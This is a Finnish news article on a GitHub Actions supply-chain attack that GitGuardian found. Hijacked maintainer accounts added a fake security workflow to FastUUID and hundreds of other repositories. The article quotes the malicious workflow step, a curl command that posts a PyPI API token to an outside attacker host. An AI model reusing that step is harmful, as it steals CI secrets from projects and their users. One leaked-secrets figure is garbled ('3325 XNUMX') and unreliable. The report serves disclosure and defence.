GitGuardianin tutkijat ovat tunnistaneet massiivisen GitHubin käyttäjiin kohdistuneen hyökkäyksen, jossa otettiin haltuunsa 327 tiliä ja asennettiin haitallinen Github-toimintojen käsittelijä 817 arkistoon. Hyökkäyksen seurauksena vuoti 3325 XNUMX jatkuvan integraation järjestelmissä käytettyä ja ympäristömuuttujien kautta välitettyä salaisuutta, mukaan lukien PyPI:n, GitHubin, NPM:n, DockerHubin ja useiden pilvitallennuspalveluiden käyttöoikeustunnukset.
GitHub Actionsin avulla koodikehittäjät voivat liittää käsittelijöitä automatisoidakseen erilaisia toimintoja GitHubissa. GitHub Actionsia voidaan esimerkiksi käyttää tiettyjen tarkistusten ja testien suorittamiseen commitin yhteydessä tai uusien ongelmien käsittelyn automatisointiin. Haitallinen käsittelijä levitettiin nimellä "Github Actions Security", ja sen "run"-osioon sisältyi "curl"-komennon, joka lähetti ympäristömuuttujien sisällön ulkoiselle isännälle suoritettaessa tehtäviä jatkuvan integraation ympäristössä. Haitallinen commit lisättiin projektin ylläpitäjien tileiltä, jotka olivat todennäköisesti aiemmin hakkeroituja tai joiden käyttäjätietoja oli tietojenkalastelussa.
Hyökkäys löydettiin analysoituaan FastUUID-pakettiin liittyvää poikkeavaa toimintaa. FastUUID tarjoaa Python-kääreen Rust UUID -kirjastolle. FastUUID:tä, jota on ladattu lähes 1.2 miljoonaa kertaa viimeisen viikon aikana, käytetään riippuvuutena suositussa LiteLLM-projektissa, jolla on yli 5 miljoonaa latausta viikossa PyPI:ssä. FastUUID-arkiston muutosten analyysi osoitti, että 2. syyskuuta projektin ylläpitäjä lisäsi commitin uudella Github-toimintojen käsittelijällä, joka sisälsi koodia tokenin lähettämiseksi PyPI-arkistoon ulkoisessa isännässä. — name: Github Actions Security run: | curl -s -X POST -d 'PYPI_API_TOKEN=${{ secrets.PYPI_API_TOKEN }}' https://bold-dhawan.45-139-104-115.plesk.page
Ongelma tunnistettiin ennen kuin hyökkääjät käyttivät siepattua tunnusta – PyPI:hin ei julkaistu FastUUID:ta varten paketin haitallisia muutoksia tai muokattuja versioita. Samanlaisia Github Action -korvauksia havaittiin 816 muussa repositoriossa, ja ilmoituksia lähetettiin niiden omistajille sekä PyPI:n, GitHubin, NPM:n ja DockerHubin ylläpitäjille. Eiliseen iltaan mennessä haitallisia committeja oli palautettu noin 100 repositoriossa. Tällä hetkellä GitHubissa tehty haku tunnistaa 671 committia, joissa on haitallinen Github Action.
Lähde: opennet.ru
